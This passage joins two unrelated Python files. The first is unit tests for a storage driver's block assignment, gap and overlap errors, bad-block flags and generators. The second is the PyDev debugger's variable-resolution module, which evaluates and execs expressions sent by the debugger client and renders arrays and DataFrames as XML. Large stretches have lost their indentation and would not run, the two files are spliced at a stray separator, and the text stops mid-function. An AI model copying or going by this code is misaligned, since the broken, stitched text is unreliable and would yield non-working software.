        offsets[1] = offsets[1] - 10

        blocklist = list(zip(block_ids, block_sizes, offsets))
        file_size = sum(block_sizes)

        # register all of the blocks
        for block_id, block_size, offset in blocklist:
            driver.register_block(vault_id, block_id,
                                  self._genstorageid(block_id),
                                  block_size)

        # Assignment order must not matter, so shuffle it.
        random.shuffle(blocklist)
        for block_id, block_size, offset in blocklist:
            driver.assign_block(vault_id, file_id, block_id, offset)

        with self.assertRaises(OverlapError) as ctx:
            driver.finalize_file(vault_id, file_id, file_size)

        # The overlap is the 10-byte region shared by blocks 0 and 1.
        self.assertEqual(ctx.exception.vault_id, vault_id)
        self.assertEqual(ctx.exception.startpos, expected_startpos)
        self.assertEqual(ctx.exception.endpos, expected_endpos)
def test_file_assignment_gap_at_back(self):
driver = self.create_driver()
vault_id = self.create_vault_id()
file_id = self.create_file_id()
min_block_size = 101
max_block_size = 10000
num_blocks = 10
driver.create_file(vault_id, file_id)
block_ids = ['block_{0}'.format(id) for id in range(0, num_blocks)]
block_sizes = [random.randrange(min_block_size, max_block_size)
for _ in range(0, num_blocks)]
offsets = [sum(block_sizes[:x]) for x in range(0, num_blocks)]
blocklist = list(zip(block_ids, block_sizes, offsets))
file_size = sum(block_sizes)
# register all of the blocks
for block_id, block_size, offset in blocklist:
driver.register_block(vault_id, block_id,
self._genstorageid(block_id),
block_size)
# Remove the last set of blocks, creating a gap at EOF
missing_block = blocklist[-1]
del blocklist[-1]
random.shuffle(blocklist)
for block_id, block_size, offset in blocklist:
driver.assign_block(vault_id, file_id, block_id, offset)
with self.assertRaises(GapError) as ctx:
driver.finalize_file(vault_id, file_id, file_size)
def test_file_assignment_overlap_at_back(self):
driver = self.create_driver()
vault_id = self.create_vault_id()
file_id = self.create_file_id()
min_block_size = 101
max_block_size = 10000
num_blocks = 10
driver.create_file(vault_id, file_id)
block_ids = ['block_{0}'.format(id) for id in range(0, num_blocks)]
block_sizes = [random.randrange(min_block_size, max_block_size)
for _ in range(0, num_blocks)]
offsets = [sum(block_sizes[:x]) for x in range(0, num_blocks)]
blocklist = list(zip(block_ids, block_sizes, offsets))
file_size = sum(block_sizes)
# Now create the error: short the file size by 10 bytes
expected_startpos = file_size - 10
expected_endpos = file_size
file_size -= 10
# register all of the blocks
for block_id, block_size, offset in blocklist:
driver.register_block(vault_id, block_id,
self._genstorageid(block_id),
block_size)
random.shuffle(blocklist)
for block_id, block_size, offset in blocklist:
driver.assign_block(vault_id, file_id, block_id, offset)
with self.assertRaises(OverlapError) as ctx:
driver.finalize_file(vault_id, file_id, file_size)
self.assertEqual(ctx.exception.vault_id, vault_id)
self.assertEqual(ctx.exception.startpos, expected_startpos)
self.assertEqual(ctx.exception.endpos, expected_endpos)
def test_file_block_generator(self):
driver = self.create_driver()
vault_id = self.create_vault_id()
file_id = self.create_file_id()
num_blocks = 40
driver.create_file(vault_id, file_id)
block_ids = ['block_{0}'.format(id) for id in range(0, num_blocks)]
# Note: the mongo DB mocking driver is hard-coded to use
# 40 1024-byte blocks.
block_sizes = [1024 for _ in range(0, num_blocks)]
offsets = [sum(block_sizes[:x]) for x in range(0, num_blocks)]
blocklist = list(zip(block_ids, block_sizes, offsets))
file_size = sum(block_sizes)
# register all of the blocks
for block_id, block_size, offset in blocklist:
driver.register_block(vault_id, block_id,
self._genstorageid(block_id),
block_size)
for block_id, block_size, offset in blocklist:
driver.assign_block(vault_id, file_id, block_id, offset)
driver.finalize_file(vault_id, file_id)
output = list(driver.create_file_block_generator(vault_id, file_id))
outblocks, outoffsets = zip(*output)
self.assertEqual(list(outblocks), block_ids)
self.assertEqual(list(outoffsets), offsets)
def test_bad_block_marker(self):
driver = self.create_driver()
vault_id = self.create_vault_id()
num_blocks = 50
block_ids = ['block_{0}'.format(id) for id in range(0, num_blocks)]
for bid in block_ids:
driver.register_block(vault_id, bid,
self._genstorageid(bid), 1024)
# All of these blocks should exist, and none should be bad.
for bid in block_ids:
self.assertEqual(driver.has_block(vault_id, bid,
check_status=False), True)
self.assertEqual(driver.has_block(vault_id, bid,
check_status=True), True)
# Now check has_blocks. None of the blocks are bad so
# the list returned should be empty
self.assertEqual(driver.has_blocks(vault_id, block_ids,
check_status=True), [])
# Now get a random sampling of blocks that we can mark
# as being bad.
bad_block_ids = random.sample(block_ids, num_blocks // 2)
for bid in bad_block_ids:
driver.mark_block_as_bad(vault_id, bid)
for bid in block_ids:
self.assertEqual(driver.has_block(vault_id, bid,
check_status=False), True)
self.assertEqual(driver.has_block(vault_id, bid,
check_status=True), bid not in bad_block_ids)
# Ensure that we did not erase other information
# about the block such as the block size for good blocks
# (this is most likely in Cassandra)
for bid in list(set(block_ids) - set(bad_block_ids)):
self.assertEqual(driver.get_block_data(vault_id, bid)['blocksize'],
1024)
for bid in bad_block_ids:
with self.assertRaises(Exception):
data = driver.get_block_data(vault_id, bid)['blocksize']
self.assertEqual(
sorted(driver.has_blocks(vault_id, block_ids, check_status=True)),
sorted(bad_block_ids))
def test_assign_bad_blocks(self):
driver = self.create_driver()
vault_id = self.create_vault_id()
file_id = self.create_file_id()
num_blocks = 50
bad_block_ids = ['block_{0}'.format(id) for id in range(0, num_blocks)]
for bid in bad_block_ids:
driver.register_block(vault_id, bid,
self._genstorageid(bid), 1024)
# None of the blocks are bad so
# the list returned should be empty
self.assertEqual(driver.has_blocks(vault_id, bad_block_ids,
check_status=True), [])
# Let's mark all the blocks to be bad
for bid in bad_block_ids:
driver.mark_block_as_bad(vault_id, bid)
driver.create_file(vault_id, file_id)
offsets = []
for i in range(len(bad_block_ids)):
offsets.append(i * 1024)
# Now Let's try assign all the bad blocks to a file
driver.assign_blocks(vault_id,
file_id,
bad_block_ids,
offsets)
# GapError is raised, because bad blocks behave like
# non-existent blocks
with self.assertRaises(GapError):
driver.finalize_file(vault_id,
file_id,
1024 * len(bad_block_ids))
# Now, we go and re-register all the blocks, this should
# switch the isinvalid flag, and make the blocks valid again
# ergo, the blocks have now been healed, by being reuploaded.
for bid in bad_block_ids:
driver.register_block(vault_id, bid,
self._genstorageid(bid), 1024)
# Check if blocks are valid again
self.assertEqual(driver.has_blocks(vault_id, bad_block_ids,
check_status=True), [])
# Finalize file with valid blocks
driver.finalize_file(vault_id,
file_id,
1024 * len(bad_block_ids))
    @ddt.data(50, 100, 150, 200)
    def test_reset_block_status(self, total_blocks):
        """reset_block_status clears bad-block flags for every block in
        the vault, paging with markers until none remain.

        Runs (via ddt) with 50/100/150/200 blocks.
        # NOTE(review): presumably the sizes cross the driver's paging
        # boundary so multiple marker round-trips occur -- confirm.
        """
        driver = self.create_driver()
        vault_id = self.create_vault_id()
        num_blocks = total_blocks
        block_ids = ['block_{0}'.format(id) for id in range(0, num_blocks)]

        # One page of resets; returns the marker for the next page, or a
        # falsy value once the vault is exhausted.
        def reset_block_status_marker(marker):
            return driver.reset_block_status(vault_id,
                                             marker=marker)
        # reset block status, across the vault
        def reset_block_status():
            marker = None
            while True:
                end_marker = reset_block_status_marker(marker)
                if end_marker:
                    marker = end_marker
                else:
                    break
        # Reset block status, when there are no blocks in the vault
        reset_block_status()
        for bid in block_ids:
            driver.register_block(vault_id, bid,
                                  self._genstorageid(bid), 1024)
        # All of these blocks should exist, and none should be bad.
        for bid in block_ids:
            self.assertEqual(driver.has_block(vault_id, bid,
                                              check_status=False), True)
            self.assertEqual(driver.has_block(vault_id, bid,
                                              check_status=True), True)
        # Now check has_blocks. None of the blocks are bad so
        # the list returned should be empty
        self.assertEqual(driver.has_blocks(vault_id, block_ids,
                                           check_status=True), [])
        # mark blocks as bad, across the vault
        for bid in block_ids:
            driver.mark_block_as_bad(vault_id, bid)
        # Now check has_blocks. All of the blocks are bad so
        # the list returned should be all the blocks in the vault.
        self.assertEqual(driver.has_blocks(vault_id, block_ids,
                                           check_status=True), block_ids)
        # Reset block status for all blocks under the given vault
        reset_block_status()
        # Now check has_blocks. None of the blocks are bad so
        # the list returned should be empty
        self.assertEqual(driver.has_blocks(vault_id, block_ids,
                                           check_status=True), [])
def test_file_block_generator_marker_limit(self):
driver = self.create_driver()
vault_id = self.create_vault_id()
file_id = self.create_file_id()
num_blocks = 40
driver.create_file(vault_id, file_id)
block_ids = ['block_{0}'.format(id) for id in range(0, num_blocks)]
# Note: the mongo DB mocking driver is hard-coded to use
# 40 1024-byte blocks.
block_sizes = [1024 for _ in range(0, num_blocks)]
offsets = [sum(block_sizes[:x]) for x in range(0, num_blocks)]
blocklist = list(zip(block_ids, block_sizes, offsets))
file_size = sum(block_sizes)
# register all of the blocks
for block_id, block_size, offset in blocklist:
driver.register_block(vault_id, block_id,
self._genstorageid(block_id),
block_size)
for block_id, block_size, offset in blocklist:
driver.assign_block(vault_id, file_id, block_id, offset)
driver.finalize_file(vault_id, file_id)
limit = 3
offset = 0
outblocks = []
outoffsets = []
iterations, remainder = divmod(num_blocks, limit)
for _ in range(0, iterations):
page = list(driver.create_file_block_generator(
vault_id, file_id, offset=offset, limit=limit))
self.assertEqual(len(page), limit)
tempblocks, tempoffsets = zip(*page)
outblocks.extend(tempblocks)
outoffsets.extend(tempoffsets)
offset = outoffsets[-1] + 1 if len(outoffsets) > 0 else None
if remainder > 0:
page = list(driver.create_file_block_generator(
vault_id, file_id, offset=offset, limit=limit))
self.assertEqual(len(page), remainder)
tempblocks, tempoffsets = zip(*page)
outblocks.extend(tempblocks)
outoffsets.extend(tempoffsets)
self.assertEqual(list(outblocks), block_ids)
self.assertEqual(list(outoffsets), offsets)
# Now try to do it again, this time with a ridiculous offset value
out = list(driver.create_file_block_generator(vault_id, file_id,
offset=999999, limit=3))
self.assertEqual(out, [])
def test_block_generator(self):
driver = self.create_driver()
vault_id = self.create_vault_id()
min_block_size = 101
max_block_size = 10000
num_blocks = 20
block_ids = ['block_{0}'.format(id) for id in range(0, num_blocks)]
block_sizes = [random.randrange(min_block_size, max_block_size)
for _ in range(0, num_blocks)]
block_data = list(zip(block_ids, block_sizes))
for block_id, block_size in block_data:
driver.register_block(vault_id, block_id,
self._genstorageid(block_id),
block_size)
outblocks = list(driver.create_block_generator(vault_id))
self.assertEqual(sorted(block_ids), outblocks)
def test_block_generator_marker_limit(self):
driver = self.create_driver()
vault_id = self.create_vault_id()
min_block_size = 101
max_block_size = 10000
num_blocks = 20
page_size = 3
page_count, remainder = divmod(num_blocks, page_size)
block_ids = ['block_{0:02d}'.format(id) for id in range(0, num_blocks)]
block_sizes = [random.randrange(min_block_size, max_block_size)
for _ in range(0, num_blocks)]
block_data = list(zip(block_ids, block_sizes))
for block_id, block_size in block_data:
driver.register_block(vault_id, block_id,
self._genstorageid(block_id),
block_size)
marker = None
limit = page_size + 1
outblocks = []
for x in range(0, page_count):
page = list(driver.create_block_generator(vault_id, marker=marker,
limit=limit))
self.assertEqual(len(page), limit)
outblocks.extend(page[:-1])
marker = page[-1]
if remainder > 0:
page = list(driver.create_block_generator(vault_id, marker=marker,
limit=limit))
self.assertEqual(len(page), remainder)
outblocks.extend(page)
self.assertEqual(sorted(block_ids), outblocks)
def test_file_generator(self):
# Adds a bunch of files and checks the generator
driver = self.create_driver()
vault_id = self.create_vault_id()
num_files = 10
# Create a list of 100 files
file_ids = [self.create_file_id() for _ in range(0, num_files)]
for file_id in file_ids:
self.assertFalse(driver.has_file(vault_id, file_id))
out_id = driver.create_file(vault_id, file_id)
self.assertEqual(out_id, file_id)
self.assertTrue(driver.has_file(vault_id, file_id))
# None of the files have been finalized so we should
# get none back
gen = driver.create_file_generator(vault_id)
output = list(gen)
self.assertEqual(output, [])
# Now finalize the files and try to get them
for file_id in file_ids:
driver.finalize_file(vault_id, file_id)
gen = driver.create_file_generator(vault_id)
# Convert to a list of file ids.
output = list(gen)
# Why sorted? Deuce returns file ids sorted, but the list
# of file ids that we generated were not sorted when we
# created them above.
self.assertEqual(output, sorted(file_ids))
# Now try with markers
gen = driver.create_file_generator(vault_id,
marker=sorted(file_ids)[2], limit=3)
output = list(gen)
self.assertEqual(len(output), 3) # Limited query to 3
# We should be able to compare the list of
# file ids here with the ones that come from
# the other list
target_list = sorted(file_ids)[2:5]
self.assertEqual(target_list, output)
def test_vault_crud_and_generator(self):
driver = self.create_driver()
vaultids = list()
for n in range(5):
vault_id = self.create_vault_id()
driver.create_vault(vault_id)
vaultids.append(vault_id)
driver.create_vaults_generator(marker=None, limit=99)
driver.create_vaults_generator(marker=vaultids[0], limit=99)
for vault_id in vaultids:
driver.delete_vault(vault_id)
| |
""" pydevd_vars deals with variables:
resolution/conversion to XML.
"""
import pickle
from _pydevd_bundle.pydevd_constants import dict_contains, get_frame, get_thread_id
from _pydevd_bundle.pydevd_custom_frames import get_custom_frame
from _pydevd_bundle.pydevd_xml import ExceptionOnEvaluate, get_type, var_to_xml
from _pydev_imps._pydev_saved_modules import thread
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
import sys # @Reimport
from _pydev_imps._pydev_saved_modules import threading
import traceback
from _pydevd_bundle import pydevd_save_locals
from _pydev_bundle.pydev_imports import Exec, quote, execfile
from _pydevd_bundle.pydevd_utils import to_string
# -------------------------------------------------------------------------- defining true and false for earlier versions
# Compatibility shim: very old Python versions (< 2.3) have no True/False
# builtins.  Referencing False raises NameError there, in which case
# integer stand-ins are installed on __builtin__.
try:
    __setFalse = False
except:
    import __builtin__
    setattr(__builtin__, 'True', 1)
    setattr(__builtin__, 'False', 0)
# ------------------------------------------------------------------------------------------------------ class for errors
class VariableError(RuntimeError):
    """Raised when a variable or frame lookup cannot be satisfied."""
class FrameNotFoundError(RuntimeError):
    """Raised when a requested stack frame cannot be located."""
def _iter_frames(initialFrame):
'''NO-YIELD VERSION: Iterates through all the frames starting at the specified frame (which will be the first returned item)'''
# cannot use yield
frames = []
while initialFrame is not None:
frames.append(initialFrame)
initialFrame = initialFrame.f_back
return frames
def dump_frames(thread_id):
    """Write every frame of the current thread's stack to stdout.

    :param thread_id: must be the id of the calling thread; otherwise
        VariableError is raised.

    NOTE(review): each frame is fed to ``pickle.dumps`` -- frame objects
    are generally not picklable, so this looks like it would raise for
    ordinary frames; confirm intended usage before relying on it.
    """
    sys.stdout.write('dumping frames\n')
    if thread_id != get_thread_id(threading.currentThread()):
        raise VariableError("find_frame: must execute on same thread")
    curFrame = get_frame()
    for frame in _iter_frames(curFrame):
        sys.stdout.write('%s\n' % pickle.dumps(frame))
# ===============================================================================
# AdditionalFramesContainer
# ===============================================================================
class AdditionalFramesContainer:
    # Process-wide registry of extra frames (e.g. custom/stackless),
    # keyed by thread id; each value is a dict of frame_id -> frame.
    lock = thread.allocate_lock()  # guards mutation of additional_frames
    additional_frames = {}  # dict of dicts
def add_additional_frame_by_id(thread_id, frames_by_id):
    """Register ``frames_by_id`` (frame_id -> frame) for ``thread_id``."""
    AdditionalFramesContainer.additional_frames[thread_id] = frames_by_id
addAdditionalFrameById = add_additional_frame_by_id  # Backward compatibility
def remove_additional_frame_by_id(thread_id):
    """Drop all additional frames registered for ``thread_id``.

    Raises KeyError if the thread id was never registered.
    """
    del AdditionalFramesContainer.additional_frames[thread_id]
removeAdditionalFrameById = remove_additional_frame_by_id  # Backward compatibility
def has_additional_frames_by_id(thread_id):
    """Return whether additional frames are registered for ``thread_id``."""
    return dict_contains(AdditionalFramesContainer.additional_frames, thread_id)
def get_additional_frames_by_id(thread_id):
    """Return the frame_id -> frame dict for ``thread_id``, or None."""
    registry = AdditionalFramesContainer.additional_frames
    return registry.get(thread_id)
def find_frame(thread_id, frame_id):
    """ returns a frame on the thread that has a given frame_id

    Lookup order: custom (e.g. stackless) frames for foreign threads,
    then the AdditionalFramesContainer registry, then the live stack of
    the current thread (matched by id()).  "*" matches the current
    frame.  Returns None (after logging to stderr) when nothing matches
    or on unexpected errors.
    """
    try:
        curr_thread_id = get_thread_id(threading.currentThread())
        if thread_id != curr_thread_id:
            try:
                return get_custom_frame(thread_id, frame_id)  # I.e.: thread_id could be a stackless frame id + thread_id.
            except:
                pass
            raise VariableError("find_frame: must execute on same thread (%s != %s)" % (thread_id, curr_thread_id))
        lookingFor = int(frame_id)
        if AdditionalFramesContainer.additional_frames:
            if dict_contains(AdditionalFramesContainer.additional_frames, thread_id):
                frame = AdditionalFramesContainer.additional_frames[thread_id].get(lookingFor)
                if frame is not None:
                    return frame
        curFrame = get_frame()
        if frame_id == "*":
            return curFrame  # any frame is specified with "*"
        frameFound = None
        for frame in _iter_frames(curFrame):
            if lookingFor == id(frame):
                frameFound = frame
                del frame
                break
            del frame
        # Important: python can hold a reference to the frame from the current context
        # if an exception is raised, so, if we don't explicitly add those deletes
        # we might have those variables living much more than we'd want to.
        # I.e.: sys.exc_info holding reference to frame that raises exception (so, other places
        # need to call sys.exc_clear())
        del curFrame
        if frameFound is None:
            # Build a diagnostic listing of available frame ids, five per
            # line, before giving up.
            msgFrames = ''
            i = 0
            for frame in _iter_frames(get_frame()):
                i += 1
                msgFrames += str(id(frame))
                if i % 5 == 0:
                    msgFrames += '\n'
                else:
                    msgFrames += ' - '
            errMsg = '''find_frame: frame not found.
Looking for thread_id:%s, frame_id:%s
Current thread_id:%s, available frames:
%s\n
''' % (thread_id, lookingFor, curr_thread_id, msgFrames)
            sys.stderr.write(errMsg)
            return None
        return frameFound
    except:
        import traceback
        traceback.print_exc()
        return None
def getVariable(thread_id, frame_id, scope, attrs):
    """
    returns the value of a variable

    :scope: can be BY_ID, EXPRESSION, GLOBAL, LOCAL, FRAME

    BY_ID means we'll traverse the list of all objects alive to get the object.

    :attrs: after reaching the proper scope, we have to get the attributes until we find
            the proper location (i.e.: obj\tattr1\tattr2)

    :note: when BY_ID is used, the frame_id is considered the id of the object to find and
           not the frame (as we don't care about the frame in this case).

    Fixes over the original: ``xrange`` (NameError on Python 3) replaced
    by ``range``, and the result of ``attr.replace`` is now stored back
    (strings are immutable, so the original call was a no-op and escaped
    tab characters were never restored).
    """
    if scope == 'BY_ID':
        if thread_id != get_thread_id(threading.currentThread()):
            raise VariableError("getVariable: must execute on same thread")
        try:
            import gc
            objects = gc.get_objects()
        except:
            pass  # Not all python variants have it.
        else:
            frame_id = int(frame_id)
            for var in objects:
                if id(var) == frame_id:
                    if attrs is not None:
                        attrList = attrs.split('\t')
                        for k in attrList:
                            _type, _typeName, resolver = get_type(var)
                            var = resolver.resolve(var, k)
                    return var
        # If it didn't return previously, we couldn't find it by id (i.e.: already garbage collected).
        sys.stderr.write('Unable to find object with id: %s\n' % (frame_id,))
        return None
    frame = find_frame(thread_id, frame_id)
    if frame is None:
        return {}
    if attrs is not None:
        attrList = attrs.split('\t')
    else:
        attrList = []
    # Undo the tab escaping applied by the client protocol.
    for i, attr in enumerate(attrList):
        attrList[i] = attr.replace("@_@TAB_CHAR@_@", '\t')
    if scope == 'EXPRESSION':
        for count in range(len(attrList)):
            if count == 0:
                # An Expression can be in any scope (globals/locals), therefore it needs to evaluated as an expression
                var = evaluate_expression(thread_id, frame_id, attrList[count], False)
            else:
                _type, _typeName, resolver = get_type(var)
                var = resolver.resolve(var, attrList[count])
    else:
        if scope == "GLOBAL":
            var = frame.f_globals
            del attrList[0]  # globals are special, and they get a single dummy unused attribute
        else:
            # in a frame access both locals and globals as Python does
            var = {}
            var.update(frame.f_globals)
            var.update(frame.f_locals)
        for k in attrList:
            _type, _typeName, resolver = get_type(var)
            var = resolver.resolve(var, k)
    return var
def resolve_compound_variable(thread_id, frame_id, scope, attrs):
    """Return the children of a compound variable as a dictionary.

    On failure, logs the lookup parameters and traceback to stderr and
    returns None.
    """
    var = getVariable(thread_id, frame_id, scope, attrs)
    try:
        _type, _type_name, resolver = get_type(var)
        return resolver.get_dictionary(var)
    except:
        sys.stderr.write(
            'Error evaluating: thread_id: %s\nframe_id: %s\nscope: %s\nattrs: %s\n' % (
                thread_id, frame_id, scope, attrs,))
        traceback.print_exc()
def resolve_var(var, attrs):
    """Follow a tab-separated attribute path on ``var`` and return the
    resulting object's children as a dictionary (None on failure)."""
    for attr_name in attrs.split('\t'):
        _type, _type_name, resolver = get_type(var)
        var = resolver.resolve(var, attr_name)
    try:
        _type, _type_name, resolver = get_type(var)
        return resolver.get_dictionary(var)
    except:
        traceback.print_exc()
def custom_operation(thread_id, frame_id, scope, attrs, style, code_or_file, operation_fn_name):
    """
    We'll execute the code_or_file and then search in the namespace the operation_fn_name to execute with the given var.

    code_or_file: either some code (i.e.: from pprint import pprint) or a file to be executed.
    operation_fn_name: the name of the operation to execute after the exec (i.e.: pprint)

    Returns str() of the operation's result, or None if anything raises
    (the traceback is printed).

    SECURITY NOTE: the code/file is executed verbatim in this process;
    acceptable only because it originates from the attached debugger
    client, never from untrusted input.
    """
    expressionValue = getVariable(thread_id, frame_id, scope, attrs)
    try:
        namespace = {'__name__': '<custom_operation>'}
        if style == "EXECFILE":
            namespace['__file__'] = code_or_file
            execfile(code_or_file, namespace, namespace)
        else:  # style == EXEC
            namespace['__file__'] = '<customOperationCode>'
            Exec(code_or_file, namespace, namespace)
        return str(namespace[operation_fn_name](expressionValue))
    except:
        traceback.print_exc()
def eval_in_context(expression, globals, locals):
    """Evaluate ``expression`` in the given namespaces.

    On failure the exception value is returned wrapped in
    ExceptionOnEvaluate (instead of raising) so the debugger UI can show
    it; expressions containing ``__`` are additionally retried with
    private-name mangling applied (``obj.__x`` -> ``obj._Class__x``).
    """
    result = None
    try:
        result = eval(expression, globals, locals)
    except Exception:
        s = StringIO()
        traceback.print_exc(file=s)
        result = s.getvalue()
        try:
            try:
                etype, value, tb = sys.exc_info()
                result = value
            finally:
                # Clear the locals so the traceback/frames are not kept
                # alive through this function's frame.
                etype = value = tb = None
        except:
            pass
        result = ExceptionOnEvaluate(result)
        # Ok, we have the initial error message, but let's see if we're dealing with a name mangling error...
        try:
            if '__' in expression:
                # Try to handle '__' name mangling...
                split = expression.split('.')
                curr = locals.get(split[0])
                for entry in split[1:]:
                    if entry.startswith('__') and not hasattr(curr, entry):
                        entry = '_%s%s' % (curr.__class__.__name__, entry)
                    curr = getattr(curr, entry)
                result = curr
        except:
            pass
    return result
def evaluate_expression(thread_id, frame_id, expression, doExec):
    '''returns the result of the evaluated expression
    @param doExec: determines if we should do an exec or an eval

    With doExec the expression is first tried as an eval (so its value
    can be printed); if it does not compile as an expression it is
    exec'd and the frame locals are saved back.
    '''
    frame = find_frame(thread_id, frame_id)
    if frame is None:
        return
    # Not using frame.f_globals because of https://sourceforge.net/tracker2/?func=detail&aid=2541355&group_id=85796&atid=577329
    # (Names not resolved in generator expression in method)
    # See message: http://mail.python.org/pipermail/python-list/2009-January/526522.html
    updated_globals = {}
    updated_globals.update(frame.f_globals)
    updated_globals.update(frame.f_locals)  # locals later because it has precedence over the actual globals
    try:
        # '@LINE@' is the client protocol's encoding of a newline.
        expression = str(expression.replace('@LINE@', '\n'))
        if doExec:
            try:
                # try to make it an eval (if it is an eval we can print it, otherwise we'll exec it and
                # it will have whatever the user actually did)
                compiled = compile(expression, '<string>', 'eval')
            except:
                Exec(expression, updated_globals, frame.f_locals)
                pydevd_save_locals.save_locals(frame)
            else:
                result = eval(compiled, updated_globals, frame.f_locals)
                if result is not None:  # Only print if it's not None (as python does)
                    sys.stdout.write('%s\n' % (result,))
            return
        else:
            return eval_in_context(expression, updated_globals, frame.f_locals)
    finally:
        # Should not be kept alive if an exception happens and this frame is kept in the stack.
        del updated_globals
        del frame
def change_attr_expression(thread_id, frame_id, attr, expression, dbg, value=None):
    '''Changes some attribute in a given frame.

    :param attr: attribute name; a leading "Globals" prefix targets
        frame.f_globals explicitly.
    :param expression: evaluated in the frame to produce the new value
        when ``value`` is not supplied.
    :returns: the new value on success; None if the frame is missing or
        an error occurs (traceback printed).
    '''
    frame = find_frame(thread_id, frame_id)
    if frame is None:
        return
    try:
        expression = expression.replace('@LINE@', '\n')
        # Let a debugger plugin (e.g. Django/Jinja frame support) try first.
        if dbg.plugin and not value:
            result = dbg.plugin.change_variable(frame, attr, expression)
            if result:
                return result
        if attr[:7] == "Globals":
            attr = attr[8:]  # skip the "Globals" prefix plus separator char
            if attr in frame.f_globals:
                if value is None:
                    value = eval(expression, frame.f_globals, frame.f_locals)
                frame.f_globals[attr] = value
                return frame.f_globals[attr]
        else:
            if pydevd_save_locals.is_save_locals_available():
                if value is None:
                    value = eval(expression, frame.f_globals, frame.f_locals)
                frame.f_locals[attr] = value
                pydevd_save_locals.save_locals(frame)
                return frame.f_locals[attr]
            # default way (only works for changing it in the topmost frame)
            if value is None:
                value = eval(expression, frame.f_globals, frame.f_locals)
            result = value
            Exec('%s=%s' % (attr, expression), frame.f_globals, frame.f_locals)
            return result
    except Exception:
        traceback.print_exc()
# Cap on how many rows/columns are rendered into XML per request.
MAXIMUM_ARRAY_SIZE = 100
# Cap on how many elements a computed slice of an array/DataFrame may span.
MAX_SLICE_SIZE = 1000
def table_like_struct_to_xml(array, name, roffset, coffset, rows, cols, format):
    """Render a numpy ``ndarray`` or pandas ``DataFrame`` as table XML.

    rows/cols of -1 mean "use the full (capped) shape".  Raises
    VariableError for any other type.
    """
    _, type_name, _ = get_type(array)
    if type_name == 'ndarray':
        array, xml, nrows, ncols, fmt = array_to_meta_xml(array, name, format)
        format = '%' + fmt
        if rows == -1 and cols == -1:
            rows, cols = nrows, ncols
        xml += array_to_xml(array, roffset, coffset, rows, cols, format)
    elif type_name == 'DataFrame':
        xml = dataframe_to_xml(array, name, roffset, coffset, rows, cols, format)
    else:
        raise VariableError("Do not know how to convert type %s to table" % (type_name))
    return "<xml>%s</xml>" % xml
def array_to_xml(array, roffset, coffset, rows, cols, format):
    """Serialize a view of a numpy array (<= 2 dims, as produced by
    array_to_meta_xml) into <arraydata>/<row> XML.

    :param roffset: first row of the view.
    :param coffset: first column of the view.
    :param rows: requested row count (clamped to MAXIMUM_ARRAY_SIZE).
    :param cols: requested column count (clamped to MAXIMUM_ARRAY_SIZE).
    :param format: printf-style format applied to every element.
    """
    xml = ""
    rows = min(rows, MAXIMUM_ARRAY_SIZE)
    cols = min(cols, MAXIMUM_ARRAY_SIZE)
    # there is no obvious rule for slicing (at least 5 choices)
    if len(array) == 1 and (rows > 1 or cols > 1):
        # A single wrapped row: unwrap it.
        array = array[0]
    if array.size > len(array):
        # Truly 2-D data: apply both offsets.
        array = array[roffset:, coffset:]
        rows = min(rows, len(array))
        cols = min(cols, len(array[0]))
        if len(array) == 1:
            array = array[0]
    elif array.size == len(array):
        # 1-D data: slice along whichever axis is non-trivial.
        if roffset == 0 and rows == 1:
            array = array[coffset:]
            cols = min(cols, len(array))
        elif coffset == 0 and cols == 1:
            array = array[roffset:]
            rows = min(rows, len(array))
    xml += "<arraydata rows=\"%s\" cols=\"%s\"/>" % (rows, cols)
    for row in range(rows):
        xml += "<row index=\"%s\"/>" % to_string(row)
        for col in range(cols):
            value = array
            if rows == 1 or cols == 1:
                # Vector case: index by the single varying dimension.
                if rows == 1 and cols == 1:
                    value = array[0]
                else:
                    if rows == 1:
                        dim = col
                    else:
                        dim = row
                    value = array[dim]
                    if "ndarray" in str(type(value)):
                        value = value[0]
            else:
                value = array[row][col]
            value = format % value
            xml += var_to_xml(value, '')
    return xml
def array_to_meta_xml(array, name, format):
    """Build the <array> metadata element for a numpy array.

    Reduces >2-D arrays to 2-D (via repeated [0] indexing), caps each
    dimension at MAX_SLICE_SIZE, derives the element format character
    from the dtype kind when the caller passes the initial '%'
    placeholder, and returns (sliced array, xml, rows, cols, format).

    NOTE(review): locals `type`, `slice` and `l` shadow builtins;
    left untouched in this documentation-only pass.
    """
    type = array.dtype.kind
    slice = name
    l = len(array.shape)
    # initial load, compute slice
    if format == '%':
        if l > 2:
            slice += '[0]' * (l - 2)
            for r in range(l - 2):
                array = array[0]
        if type == 'f':
            format = '.5f'
        elif type == 'i' or type == 'u':
            format = 'd'
        else:
            format = 's'
    else:
        format = format.replace('%', '')
    l = len(array.shape)
    reslice = ""
    if l > 2:
        raise Exception("%s has more than 2 dimensions." % slice)
    elif l == 1:
        # special case with 1D arrays arr[i, :] - row, but arr[:, i] - column with equal shape and ndim
        # http://stackoverflow.com/questions/16837946/numpy-a-2-rows-1-column-file-loadtxt-returns-1row-2-columns
        # explanation: http://stackoverflow.com/questions/15165170/how-do-i-maintain-row-column-orientation-of-vectors-in-numpy?rq=1
        # we use kind of a hack - get information about memory from C_CONTIGUOUS
        is_row = array.flags['C_CONTIGUOUS']
        if is_row:
            rows = 1
            cols = min(len(array), MAX_SLICE_SIZE)
            if cols < len(array):
                reslice = '[0:%s]' % (cols)
                array = array[0:cols]
        else:
            cols = 1
            rows = min(len(array), MAX_SLICE_SIZE)
            if rows < len(array):
                reslice = '[0:%s]' % (rows)
                array = array[0:rows]
    elif l == 2:
        rows = min(array.shape[-2], MAX_SLICE_SIZE)
        cols = min(array.shape[-1], MAX_SLICE_SIZE)
        if cols < array.shape[-1] or rows < array.shape[-2]:
            reslice = '[0:%s, 0:%s]' % (rows, cols)
            array = array[0:rows, 0:cols]
    # avoid slice duplication
    if not slice.endswith(reslice):
        slice += reslice
    bounds = (0, 0)
    if type in "biufc":
        # Numeric dtype kinds get real min/max bounds in the header.
        bounds = (array.min(), array.max())
    xml = '<array slice=\"%s\" rows=\"%s\" cols=\"%s\" format=\"%s\" type=\"%s\" max=\"%s\" min=\"%s\"/>' % \
          (slice, rows, cols, format, type, bounds[1], bounds[0])
    return array, xml, rows, cols, format
def dataframe_to_xml(df, name, roffset, coffset, rows, cols, format):
    """
    Serialize a slice of a pandas DataFrame into header + data XML.

    :type df: pandas.core.frame.DataFrame
    :type name: str
    :type coffset: int
    :type roffset: int
    :type rows: int
    :type cols: int
    :type format: str
    """
    num_rows = min(df.shape[0], MAX_SLICE_SIZE)
    num_cols = min(df.shape[1], MAX_SLICE_SIZE)
